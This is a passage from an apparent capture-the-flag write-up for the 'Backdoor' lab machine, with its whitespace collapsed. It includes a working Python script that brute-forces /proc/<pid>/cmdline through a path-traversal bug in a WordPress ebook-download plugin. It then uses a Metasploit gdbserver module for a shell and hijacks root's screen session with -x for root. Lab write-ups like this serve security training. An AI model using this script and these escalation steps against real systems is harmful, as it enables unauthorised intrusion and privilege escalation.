I tried getting the id_rsa with LFI but the user directory didn't have any ssh keys
The port 1337 had ?waste service which nmap said ( NOTE : ?waste wasn't the service running on port 1337 )
Let's check what service that port had
I read the man page for proc and found /cmdline intresting which tells sumary about a service
Man page of proc : https://man7.org/linux/man-pages/man5/proc.5.html
I didn't found any exploits that shows services , so I made one
Check Services
Exploit.py
import requestsurl ='http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl='pl = []start =900# The service was on 956 for me, if you didn't found the service try changing the start pointfor i inrange(start,1010): pl.append(f'{url}../../../../../../../../../../../../../../../proc/{i}/cmdline')for i in pl: r = requests.get(i) check = r.textif'1337'in check:print(check)print('SERVICE SUCCESSFULLY FOUND')breakelse:print(f'trying on /proc/{start}/cmdline') start+=1
Output.txt
../../../../../../../../../../../../../../../proc/956/cmdline../../../../../../../../../../../../../../../proc/956/cmdline../../../../../../../../../../../../../../../proc/956/cmdline/bin/sh-cwhiletrue;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script>
So the port 1337 is running a gdbserver
Link : https://www.rapid7.com/db/modules/exploit/multi/gdb/gdb_server_exec/
User Shell
Use this msf exploit to get the user shell : use exploit/multi/gdb/gdb_server_exec
root9370.00.183563420?S07:150:00_/usr/sbin/CRON-froot 954 0.0 0.0 2608 1596 ? Ss 07:15 0:02 _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec s
The screen service is running at root privileges
Root Shell
user@Backdoor:~$/usr/bin/screen-h-hlinesSetthesizeofthescrollbackhistorybuffer.-iInterruptoutputsoonerwhenflowcontrolison.-lLoginmodeon (update /var/run/utmp), -ln = off.-ls [match] or-listDonothing,justlistourSockDir [on possiblematches].-LTurnonoutputlogging.-LogfilefileSetlogfilename.-mignore $STY variable,docreateanewscreensession.-OChooseoptimaloutputratherthanexactvt100emulation.-pwindowPreselectthenamedwindowifitexists.-qQuietstartup.Exitswithnon-zeroreturncodeifunsuccessful.-QCommandswillsendtheresponsetothestdoutofthequeryingprocess.-r [session] Reattach to a detached screen process.-RReattachifpossible,otherwisestartanewsession.-sshellShelltoexecuteratherthan $SHELL.-SsocknameNamethissession<pid>.socknameinsteadof<pid>.<tty>.<host>.-ttitleSettitle. (window's name).-T term Use term as $TERM for windows, rather than "screen".-U Tell screen to use UTF-8 encoding.-v Print "Screen version 4.08.00 (GNU) 05-Feb-20".-wipe [match] Do nothing, just clean up SockDir [on possible matches].-x Attach to a not detached screen. (Multi display mode).-X Execute <cmd> as a screen command in the specified session.
So as there were no exploits available on the internet we have to play with the flags
I tried to exploit with help of GTFO bins and some flags around here
So we can get root shell with the -x flag : -x UserYouWannaHijackSession / HisSessionName